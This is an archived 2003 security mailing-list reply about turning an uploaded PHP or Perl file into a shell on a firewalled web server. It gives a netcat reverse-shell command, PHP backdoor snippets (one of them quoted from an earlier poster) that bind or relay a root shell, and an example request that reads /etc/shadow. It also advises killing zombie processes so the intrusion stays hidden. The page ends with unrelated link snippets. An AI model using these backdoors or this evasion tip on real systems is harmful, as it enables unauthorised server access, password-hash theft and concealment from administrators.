Re: perl/php connect-back backdoor?

From: Diode Trnasistor (ffddfe_at_yahoo.com)
Date: 07/30/03

  • Next message: Victor Pereira: "perl/php connect-back backdoor?" 
    Date: Wed, 30 Jul 2003 03:28:41 -0700 (PDT)
To: "Knud_Erik_Højgaard" <kain@ircop.dk>, Ingram <Vail@gmx.net>, vuln-dev@securityfocus.com

    Hi,

    I've been using this technique for a while. If you
    can upload a php or a perl file which gets executed in
    the server context you already won, regardless of
    firewall rules. The obvious method is the connect
    back(i.e nc -e /bin/sh x.x.x.x 80 as that's the
    likelly allowed outbound port). If that's a no go,
    and there's absolutelly no way to estabilish a
    session, you still win.

    Consider this:
    <?
       `exploit which gets root and calls nc -e /bin/sh -l
    -p 9999`
    ?>

    then another script:
    <?
       $z = `echo $x | nc localhost 999`;
       $z=str_replace("\n", "<br>", $z);
       echo $z;
    ?>

    As is obvious, call the second script and you have
    somehwat of a crippled root shell.

    www.target.com/script2.php?x=cat /etc/shadow

    you get the point :P

    PS: the silly thing about this is that each command
    you execute this way ends up as a zombie process.
    In a few minutes of working with this "shell" you'll
    have hundreds of zombie processes on the target
    machine. What i like to do is run zkill (zkill.c
    google it) slightly modified to terminate all zombies.
     This way it's less obvious that something very odd is
    going on.

    --- Knud_Erik_Højgaard <kain@ircop.dk> wrote:
    > Ingram wrote:
    > [snip]
    > > i got right know is uid www. I think a
    > connect-back perl/php code
    > > could made it through this packtfilter, as the
    > outbound rules could
    > > be less tight.
    > >
    > > Anyone aware of a backdoor like this?
    > netcat:
    > <? passthru("nc -e /bin/sh ip port"); ?>
    >
    > or a cronjob doing the same..
    >
    > --
    > kokanin

    __________________________________
    Do you Yahoo!?
    Yahoo! SiteBuilder - Free, easy-to-use web site design software
    http://sitebuilder.yahoo.com

  • Next message: Victor Pereira: "perl/php connect-back backdoor?"

    Relevant Pages

    • SUMMARY: cropping a file
      ... Although this will execute very quickly (assuming ... The logfile is being modified by two ... he executes the 'w' command. ... > Do you Yahoo!? ...
      (Tru64-UNIX-Managers)
    • Re: How to read URLs "current" content ? (already tried using URLConnection/HttpURLConnection unsucc
      ... Below is the sample program that I tried to execute. ... not the content that I see when I open the yahoo homepage. ... different browsers, based on the User-Agent header, as shown here: ... Here is additional information on User-Agent for popular browsers: ...
      (comp.lang.java.help)
    • Re: YUMGUI - YUMI
      ... hdc.If it is a scsi device you need to execute: ... Thru' this command the iso image in the first CD which ... New and Improved Yahoo! ...
      (Fedora)
    • Re: [9fans] newbie question
      ... script at the teminal prompt. ... to the directory /sys/lib and execute the newuser ... Do You Yahoo!? ... Mail has the best spam ...
      (comp.os.plan9)
    • Re: Zombie process
      ... Vicky wrote: ... > execute is not important. ... if you tell me what I do wrong so I have zombie process. ... You probably want to waiton the process after you kill it when it ...
      (comp.os.linux.development.apps)